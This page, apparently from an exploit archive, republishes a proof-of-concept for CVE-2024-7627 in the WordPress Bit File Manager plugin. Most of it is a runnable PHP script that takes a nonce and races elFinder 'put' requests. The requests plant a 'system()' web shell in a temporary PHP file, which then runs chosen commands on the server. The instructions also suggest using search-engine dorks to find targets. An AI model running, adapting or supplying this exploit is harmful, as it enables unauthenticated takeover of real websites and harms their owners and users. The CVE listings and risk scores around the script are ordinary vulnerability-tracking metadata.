WordPress Bit File Manager 6.5.5 Race Condition / Code Injection

🗓️ 12 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 430 Views

WordPress Bit File Manager 6.5.5 vulnerable to code injection via race condition exploit.

Reporter	Title	Published	Views	Family All 16
GithubExploit	Exploit for Code Injection in Bitapps File_Manager	8 Jan 202502:32	–	githubexploit
GithubExploit	Exploit for Code Injection in Bitapps File_Manager	4 Oct 202514:38	–	githubexploit
Circl	CVE-2024-7627	5 Sep 202406:19	–	circl
CNNVD	WordPress plugin Bit File Manager 代码注入漏洞	5 Sep 202400:00	–	cnnvd
CVE	CVE-2024-7627	5 Sep 202402:04	–	cve
Cvelist	CVE-2024-7627 Bit File Manager 6.0 - 6.5.5 - Unauthenticated Remote Code Execution via Race Condition	5 Sep 202402:04	–	cvelist
NVD	CVE-2024-7627	5 Sep 202403:15	–	nvd
OSV	CVE-2024-7627	5 Sep 202403:15	–	osv
Packet Storm News	WordPress Bit File Manager 6.5.5 Race Condition / Remote Code Execution	11 Feb 202500:00	–	packetstormnews
Patchstack	WordPress Bit File Manager Plugin 6.0-6.5.5 is vulnerable to Arbitrary File Upload	4 Sep 202400:00	–	patchstack

=============================================================================================================================================
    | # Title     : WordPress Bit File Manager 6.5.5 Race Condition php code injection                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/file-manager/                                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: exploiting Remote Command Execution Vulnerability via Race Condition in Vulnerable WordPress Plugins Using elFinder
    
        (Related : https://packetstorm.news/files/id/189176/ Related CVE numbers: CVE-2024-7627 ) .
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 112.
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    class Poc {
        private $targetBaseUrl;
        private $session;
        private $raceConditionJobs;
        private $ELFINDER_AJAX_ACTION = 'bit_fm_connector_front';
        private $READ_DIRECTORY_FILES_ELFINDER_COMMAND = 'open';
        private $EDIT_FILE_ELFINDER_COMMAND = 'put';
        private $AJAX_ENDPOINT;
        private $PHP_PAYLOAD = '<?php system("{cmd}");?>';
        private $EDITED_TEMPORARY_FILE_URL;
    
        public function __construct($targetBaseUrl, $raceConditionJobs = 50) {
            $this->targetBaseUrl = $targetBaseUrl;
            $this->session = curl_init();
            $this->raceConditionJobs = $raceConditionJobs;
            $this->AJAX_ENDPOINT = $this->targetBaseUrl . '/wp-admin/admin-ajax.php';
            $this->EDITED_TEMPORARY_FILE_URL = $this->targetBaseUrl . '/wp-content/uploads/file-managertemp.php';
        }
    
        public function getAjaxNonce($fileManagerPostPath) {
            echo '[*] Getting a valid AJAX nonce...' . PHP_EOL;
            $fileManagerPostUrl = $this->targetBaseUrl . $fileManagerPostPath;
            curl_setopt($this->session, CURLOPT_URL, $fileManagerPostUrl);
            curl_setopt($this->session, CURLOPT_RETURNTRANSFER, 1);
            $responseText = curl_exec($this->session);
    
            preg_match('/var fm = (.*);/', $responseText, $matches);
            if (empty($matches)) {
                echo '[-] Unable to get a valid AJAX nonce' . PHP_EOL;
                exit(0);
            }
    
            $parsedJsonObject = json_decode($matches[1], true);
            $ajaxNonce = $parsedJsonObject['nonce'];
            echo '[+] Found the valid AJAX nonce: ' . $ajaxNonce . PHP_EOL;
            return $ajaxNonce;
        }
    
        public function getRandomFileHash($nonce) {
            echo '[*] Getting a random file\'s hash via elFinder command "' . $this->READ_DIRECTORY_FILES_ELFINDER_COMMAND . '"...' . PHP_EOL;
            $bodyData = [
                'action' => $this->ELFINDER_AJAX_ACTION,
                'nonce' => $nonce,
                'cmd' => $this->READ_DIRECTORY_FILES_ELFINDER_COMMAND,
                'init' => '1'
            ];
    
            $ch = curl_init($this->AJAX_ENDPOINT);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($bodyData));
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            $jsonResponse = json_decode(curl_exec($ch), true);
            
            if (isset($jsonResponse['error'])) {
                echo '[-] Unable to get a random file\'s hash' . PHP_EOL;
                exit(0);
            }
    
            $currentWorkingDirectoryFiles = $jsonResponse['files'];
            foreach ($currentWorkingDirectoryFiles as $file) {
                if (isset($file['hash']) && isset($file['name']) && $file['mime'] !== 'directory') {
                    $fileHash = $file['hash'];
                    $filename = $file['name'];
                    break;
                }
            }
    
            echo '[+] Found file "' . $filename . '" with hash "' . $fileHash . '"!' . PHP_EOL;
            return $fileHash;
        }
    
        public function executeEditFileRaceCondition($nonce, $fileHash, $commandToExecute) {
            echo '[*] Editing file with hash "' . $fileHash . '" via elFinder command "' . $this->EDIT_FILE_ELFINDER_COMMAND . '" and getting the edited temporary PHP file at "' . $this->EDITED_TEMPORARY_FILE_URL . '"...' . PHP_EOL;
    
            $bodyData = [
                'action' => $this->ELFINDER_AJAX_ACTION,
                'nonce' => $nonce,
                'cmd' => $this->EDIT_FILE_ELFINDER_COMMAND,
                'target' => $fileHash,
                'content' => str_replace('{cmd}', $commandToExecute, $this->PHP_PAYLOAD)
            ];
    
            $results = [];
            for ($i = 0; $i < $this->raceConditionJobs; $i++) {
                $ch = curl_init($this->AJAX_ENDPOINT);
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($bodyData));
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
                $results[] = curl_exec($ch);
            }
    
            foreach ($results as $responseText) {
                if (empty($responseText)) {
                    echo '[-] Failed to read the edited temporary PHP file in time' . PHP_EOL;
                    continue;
                }
    
                echo '[+] We won the race condition! Here\'s the PHP payload result:' . PHP_EOL;
                echo $responseText . PHP_EOL;
                break;
            }
        }
    
        public function exploit($fileManagerPostPath, $commandToExecute) {
            $ajaxNonce = $this->getAjaxNonce($fileManagerPostPath);
            $fileHash = $this->getRandomFileHash($ajaxNonce);
            $this->executeEditFileRaceCondition($ajaxNonce, $fileHash, $commandToExecute);
        }
    }
    
    $targetBaseUrl = 'http://localhost'; // Change to the target URL
    $fileManagerPostPath = '/?p=6'; // Change to the correct path
    $commandToExecute = 'whoami; id; hostname'; // Command to execute
    
    $poc = new Poc($targetBaseUrl);
    $poc->exploit($fileManagerPostPath, $commandToExecute);
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

12 Mar 2025 00:00Current

7.9High risk

Vulners AI Score7.9

CVSS 3.18.1

EPSS0.28556

SSVC